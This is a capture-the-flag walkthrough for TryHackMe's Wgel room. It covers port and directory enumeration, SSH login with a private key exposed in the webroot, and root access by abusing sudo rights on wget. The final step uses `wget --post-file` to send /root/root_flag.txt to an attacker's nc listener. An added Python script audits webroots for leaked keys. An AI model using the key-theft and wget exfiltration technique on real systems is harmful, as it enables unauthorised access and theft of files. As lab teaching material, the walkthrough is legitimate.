Wgel CTF is a simple CTF room from TryHackMe – check it out here. Have fun, and I hope you learn something from it. Let’s start with a simple port scan to see what we can enumerate:
nmap -sV -A $IP
Options:
-sV – probes each open port to determine the version of the running service
-A – aggressive scan – enables OS detection, version detection, default NSE scripts and traceroute
Output:
Host is up (0.058s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
| 256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
|_ 256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Now we see that there is a webserver running. Let’s start gobuster, and while it brute-forces directories we can go and take a look at the webpage:
gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Now let’s see the webpage:
Hmmm a default looking apache2 webpage, but let’s check the source code. Always check the source code. And boom we have a username:
`-- *.conf
<!-- Jessie don't forget to update the website -->
</pre>
Okay, so gobuster returned only one directory, “/sitemap”. Let’s run gobuster against this directory too, and while it’s running let’s go and have a look:
gobuster dir -u $IP/sitemap -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Now let’s see the sitemap:
Okay, so nothing interesting here. I tried to find something, but nothing on the page itself was useful. Let’s check whether gobuster found something:
#I cut out what wasn't interesting:
/.ssh
Now if we browse to that web directory we can see an id_rsa key, i.e. a private SSH key served straight from the webroot. We can use it to log into the box. Let’s use wget to download it:
wget http://$IP/sitemap/.ssh/id_rsa
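The root cause here is a private key sitting inside the document root. As an added defensive example (not from the original post), the script below audits a webroot for exactly that: it flags dot-directories such as .ssh and any file that starts with a PEM/OpenSSH private-key header, and reports whether the key file is world-readable. The demo tree it builds is constructed for illustration and contains no real key material.

```python
import os
import re
import stat
import tempfile

# Headers used by PEM and OpenSSH private keys (RSA, EC, DSA, generic, encrypted).
PRIVATE_KEY_HEADER = re.compile(
    rb"-----BEGIN (?:OPENSSH |RSA |EC |DSA |ENCRYPTED )?PRIVATE KEY-----"
)
# Directories that should never be reachable through a web server.
SENSITIVE_DIRS = {".ssh", ".git", ".svn"}


def scan_webroot(root: str, max_bytes: int = 4096) -> list[dict]:
    """Walk a document root and return a list of findings (path, issue)."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        for d in dirnames:
            if d in SENSITIVE_DIRS:
                findings.append({"path": os.path.normpath(os.path.join(rel_dir, d)),
                                 "issue": "sensitive directory under webroot"})
        for f in filenames:
            full = os.path.join(dirpath, f)
            try:
                with open(full, "rb") as fh:
                    head = fh.read(max_bytes)  # headers sit at the very start
            except OSError:
                continue
            if PRIVATE_KEY_HEADER.search(head):
                mode = stat.S_IMODE(os.stat(full).st_mode)
                findings.append({"path": os.path.normpath(os.path.relpath(full, root)),
                                 "issue": "private key material",
                                 "world_readable": bool(mode & stat.S_IROTH)})
    return findings


def make_demo_webroot() -> str:
    """Build a constructed webroot mirroring the layout seen in the room (fake key body)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "sitemap", ".ssh"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html><body>It works</body></html>\n")
    with open(os.path.join(root, "sitemap", ".ssh", "id_rsa"), "wb") as fh:
        fh.write(b"-----BEGIN RSA PRIVATE KEY-----\nCONSTRUCTED-NOT-A-REAL-KEY\n"
                 b"-----END RSA PRIVATE KEY-----\n")
    return root


if __name__ == "__main__":
    for finding in scan_webroot(make_demo_webroot()):
        print(finding)
```

Run it against a real document root (e.g. /var/www/html) as part of a deployment check; any hit means the file must be removed from the webroot and the key rotated.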
Now that we have the id_rsa private key we don’t need a password, only the username we found earlier in the page source. Note that ssh refuses a private key that is readable by other users, so run chmod 600 id_rsa first if needed. Now let’s use this command to ssh into wgel’s box:
sudo ssh -i id_rsa jessie@$IP
Okay so now we are jessie. Let’s change directories to “Documents” and we can cat out the user_flag.txt. Now for root let’s first try with “sudo -l” and see what we can do:
Perfect: sudo -l shows that jessie may run /usr/bin/wget as root. Since wget’s --post-file option reads any file the process can open and sends it in an HTTP POST body, running it as root lets us send “/root/root_flag.txt” to our machine, where we catch it with nc. Open up a new pane in tmux (if you don’t know how, check out the tutorial here):
#in the new pane:
sudo nc -lvnp 80
#in jessie's machine:
sudo -u root /usr/bin/wget --post-file=/root/root_flag.txt <your-ip-here>
Now if you check your nc listener you will see the POST request from wget, with the contents of the root flag in its body.